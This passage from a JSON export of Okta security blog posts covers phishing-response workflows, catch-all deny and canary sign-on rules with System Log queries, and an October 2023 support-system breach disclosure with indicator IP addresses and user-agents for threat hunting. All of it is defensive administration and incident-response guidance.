whether any other users successfully authenticated via a suspicious IP. If any value is returned, the flow can automatically \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/users/#clear-current-user-sessions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"clear the user’s sessions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If users entered a password as part of the authentication flow (irrespective of whether they successfully authenticated), the flow can call System Log to check whether the user’s corporate email application was accessed during the session in question. This can help determine whether to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/okta/actions/resetpassword.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"reset the user’s password\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Raise a request to add the IP to an org-wide blocklist (network zone) to prevent future authentication requests via the attacker’s infrastructure.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To see these ideas in action, we recommend catching up on the recorded sessions delivered on FastPass phishing resistance at this week's Oktane22 conference [Registration 
Required]:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane22/online-register/?utm_source=send&utm_medium=email&utm_campaign=2022_11_EV_OKT_Oktane22Online&utm_id=aNK4z000000Cc9PGAS\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Deep Dive: Preventing Credential Phishing Attacks with Passwordless and Phishing Resistant Authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane22/online-register/?utm_source=send&utm_medium=email&utm_campaign=2022_11_EV_OKT_Oktane22Online&utm_id=aNK4z000000Cc9PGAS\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Deep Dive: Achieving Frictionless and Enhanced Credential Phishing Resistance with Okta FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Changelog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - May 26, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated detection query to include the missing outcome required in the outcome.result field.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - Nov 20, 
2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original Version Published\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T01:55:30.200Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"},{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"<p>The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. 
Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.</p>"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/catchallsandcanaryrules","id":"601d2715-c6e5-56f7-82a4-c1d77f46c0d4","title":"Catch-All's and Canary Rules","date":"2023-02-23T02:56:02+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine offers admins the ability to vary authentication flows to applications based on everything from group membership, device management, device posture, network zones, risk evaluation, user behaviour and more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Generally speaking, the more context evaluated at the point of access, the better the security outcome. That’s what this whole zero trust journey is about: all the stars should align before a legitimate user can access a sensitive resource.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The flip-side of this is that it can be tempting to write a large number of distinct rules. It’s for this reason Okta recommends grouping apps and other resources by authentication assurance level (AAL): applying the most stringent set of rules to all apps designated as AAL3, another ruleset for all AAL2 apps, another for AAL1 etc. 
These \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-3.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"standards exist\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to dramatically simplify life as an admin.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But if your rules do wind up being - well, unruly - there is always the possibility of an unexpected access scenario that didn’t present itself during testing. In Okta Identity Engine, rules are evaluated according to priority. During sign-on, the rule at the top of your list is evaluated first, and if the request doesn’t meet that rule, the next rule in line is evaluated, and so forth.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If an access request doesn’t meet any of the rules, it usually falls to the Default “Catch-All” rule. The Default Catch-All rule in most scenarios will allow access if primary authentication (such as a password or access to an email inbox) is satisfied. 
This is the default setting to avoid locking legitimate admins/users out while the org is being configured.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But once you’re up and running, you should think about a “deny by default” approach.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny by Default\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A well-established production workforce org should configure the catch-all rule (or create a new catch-all rule, if necessary*), that explicitly \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"denies access\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4rr05Dceaj3Odj4Pq9QRaL\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That’s it. No other conditions. If a legitimate user falls through the cracks of the expected authentication context, that’s where they should land.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given the potential disruption this might cause to users, it’s prudent to write a report, detection or workflow that notifies admins of the catch-all being triggered.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You first need a query that identifies Policy Evaluation events that resulted in “DENY”, with the ID or DisplayName of your Catch-All Deny rule as a target. 
In my test org, the query would be:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and outcome.result eq \\\"DENY\\\" and target.displayName eq \\\"Catch-All Deny\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For what it's worth, I used an Advanced Filter in System Log to create this query. Once I validated it was matching on my test events, I saved it as a permanent report under \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Reports\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in the Okta Admin console. Note that matching on target.displayName is convenient but brittle: if the rule is ever renamed, the query silently stops matching, so prefer the rule’s target.id in any report or detection you rely on long-term.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5z31sSNegtuoXPWqZ4POd8\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ideally, you want to be notified when a request matches this rule. Unfortunately, there isn’t an Okta Card in Workflows or Event Hook built to trigger a Workflow every time a specific policy is evaluated (there isn’t a pre-built Okta card or Event Hook for policy.evaluate_sign_on events). 
So your options for notifying admins are to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"check the Reports page on a regular basis (very manual),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"add the rule to your SIEM (close to real-time) or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"use a Scheduled Flow in Okta Workflows to check for these events at regular intervals.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below is a sample workflow I produced to illustrate the third option. To configure the Workflow, the admin first schedules the flow, enters the Target ID for the Catch-All Deny Policy Rule and enters the Okta Org name. The last bit of configuration required is a “Subtract” card that needs to be set to the same interval as the flow schedule.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5u5TwnovvPYpWp5NQPFj6A\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The flow then queries Okta System Log for DENY events that triggered our catch-all deny rule. We only continue to process the flow if one or more of these events are returned. 
For each event returned, we call a helper flow that sends a notification to the SOC.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3LiD0EQHPdlJqVgKI6az7\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The helper flow, listed below, creates a URL for the SOC alert, which provides analysts a one-click access to the event in the System Log of the Admin Console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5oHc96sVGt0nsshmNY5RnW\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I’m using Slack to notify admins, you could substitute the same card with an action from the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/Content/Topics/Workflows/connector-reference/connector-reference.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"pre-built connectors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for Teams, Jira, PagerDuty, ServiceNow, Gmail, Office365 and more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6JkbQCmxYyJCzkrmsDOnP0\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here’s my sample alert:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1hi45dgLZhhDmGHQUuVRxA\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When the analyst clicks on the link and they’re taken straight to the System Log console with the Unique ID for the deny event 
already populated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1KDPxrhHmICmBhyVWSellT\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A Canary Rule?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As previously discussed, there are some constraints that limit the ability to identify denied requests in real-time in anything other than a SIEM (check out \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Streaming, now in GA!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you require real-time feedback on the impact of a change immediately after you've made it you might also consider introducing what I (somewhat clumsily) call a temporary “Canary Rule” that allows user access after any MFA.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This rule would be one higher than your lowest ranked policy (the Catch-All “Deny Access” rule) but one lower than the rules that govern expected access conditions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This rule has to be able to authenticate legitimate users, with a simple policy rule: “allow access with any two factor types”.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To be clear, this canary is a rule that 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"should never be met\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" if your policies are tuned correctly. It exists only to alert your IDAM team whenever a user that is \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"more than likely legitimate\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" attempted to access your apps outside of expected policy conditions. Ideally the rule should only be enabled for a short period of time after policy conditions are changed, and disabled once you’re confident that your rule set is meeting all the expected conditions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1068Ah09QKDCJjUN4LGjQs\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Implementing a canary rule doesn’t negate the need for thorough testing in your preview environment or adhering to change management processes. 
It’s just an additional method of gaining confidence that a recent change in production is delivering the expected results.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Making the Canary sing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When a user attempts to sign-in and the Canary policy rule is evaluated, there should be a policy evaluation event with the ID and displayName associated with the canary policy in the target object.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So in my test org this could be either of the following:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and target.id eq \\\"[redacted string]\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"policy.evaluate_sign_on\\\" and target.displayName eq \\\"Canary Rule\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You could use a scheduled flow for this (as I did for the Catch-All Deny workflow), but with a bit of sticky tape and elastic bands I built a PoC that triggers at the start of every user session, and finds a corresponding policy evaluation event that meets some specific conditions. 
Where they match, the flow continues and prepares a Slack notification that provides analysts a link to the entire user session in System Log:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"65qbx6AK1lC7zDl5B7VJIH\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So that's it! I hope you're left understanding the two distinct use cases I've presented here:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Catch-All Deny\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" should be permanent. Queries for denied requests should be accessible via a Report or a scheduled flow.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Canary Rule\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" should be temporary, and attempts only to help IDAM analysts identify gaps in their policies. 
Queries for denied requests should be accessible via a Report and there are numerous ways to write workflows, given it creates authentication events.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I'm keen to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://infosec.exchange/@breditor\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"hear your feedback!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"* \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"If you find that a default catch-all rule isn’t editable, create a new “Deny by Default” rule and order it above the default rule.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T01:53:53.423Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2023/10/tracking-unauthorized-access-oktas-support-system","id":"60979cef-04c5-5f0c-8d3a-9da0c64aec8e","title":"Tracking Unauthorized Access to Okta's Support System","date":"2023-10-20T14:41:32+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security has identified adversarial activity that leveraged access to a stolen credential to access Okta's support case management system.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases. It should be noted that the Okta support case management system is separate from the production Okta service, which is fully operational and has not been impacted. In addition, the Auth0/CIC case management system is not impacted by this incident.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Note: All customers who were impacted by this have been notified. 
If you’re an Okta customer and you have not been contacted with another message or method, there is no impact to your Okta environment or your support tickets.\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within the course of normal business, Okta support will ask customers to upload an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oag/en-us/content/topics/access-gateway/troubleshooting-with-har.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"HTTP Archive (HAR)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" file, which allows for troubleshooting of issues by replicating browser activity. HAR files can also contain sensitive data, including cookies and session tokens, that malicious actors can use to impersonate valid users. Okta has worked with impacted customers to investigate, and has taken measures to protect our customers, including the revocation of embedded session tokens. In general, Okta recommends sanitizing all credentials and cookies/session tokens within a HAR file before sharing it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attacks such as this highlight the importance of remaining vigilant and being on the lookout for suspicious activity. We are sharing the following Indicators of Compromise to assist customers who wish to perform their own threat hunting activity. We recommend referring to our previously \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/02/user-sign-and-recovery-events-okta-system-log\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published advice\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on how to search System Log for any given suspicious session, user or IP. 
Please note that the majority of the indicators are commercial VPN nodes according to our enrichment information.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP Addresses\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"23.105.182.19\\n104.251.211.122\\n202.59.10.100\\n162.210.194.35 (BROWSEC VPN)\\n198.16.66.124 (BROWSEC VPN)\\n198.16.66.156 (BROWSEC VPN)\\n198.16.70.28 (BROWSEC VPN)\\n198.16.74.203 (BROWSEC VPN)\\n198.16.74.204 (BROWSEC VPN)\\n198.16.74.205 (BROWSEC VPN)\\n198.98.49.203 (BROWSEC VPN)\\n2.56.164.52 (NEXUS PROXY)\\n207.244.71.82 (BROWSEC VPN)\\n207.244.71.84 (BROWSEC VPN)\\n207.244.89.161 (BROWSEC VPN)\\n207.244.89.162 (BROWSEC VPN)\\n23.106.249.52 (BROWSEC VPN)\\n23.106.56.11 (BROWSEC VPN)\\n23.106.56.21 (BROWSEC VPN)\\n23.106.56.36 (BROWSEC VPN)\\n23.106.56.37 (BROWSEC VPN)\\n23.106.56.38 (BROWSEC VPN)\\n23.106.56.54 (BROWSEC VPN)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User-Agents\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While the following user-agents are legitimate, they may be rare in your environment given the release of Chrome 99 in March 2022.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mozilla/5.0 (Windows NT 10.0) \\nAppleWebKit/537.36 (KHTML, like Gecko) \\nChrome/99.0.7113.93 Safari/537.36\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(Legitimate, but older user-agent)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mozilla/5.0 
(Macintosh; Intel Mac OS X 10_15_7) \\nAppleWebKit/537.36 (KHTML, like Gecko) \\nChrome/99.0.4844.83 Safari/537.36\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(Legitimate, but older user-agent)\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-07-11T01:51:14.460Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. 
in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2023/02/user-sign-and-recovery-events-okta-system-log","id":"3c6b83ab-d9e6-5eab-a478-aca6fec5932a","title":"User Sign-in and Recovery Events in the Okta System Log","date":"2023-02-07T05:50:22+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During a security incident, it's critical that SOC analysts (or Okta admins) can rapidly identify all activity associated with a suspicious session, user or 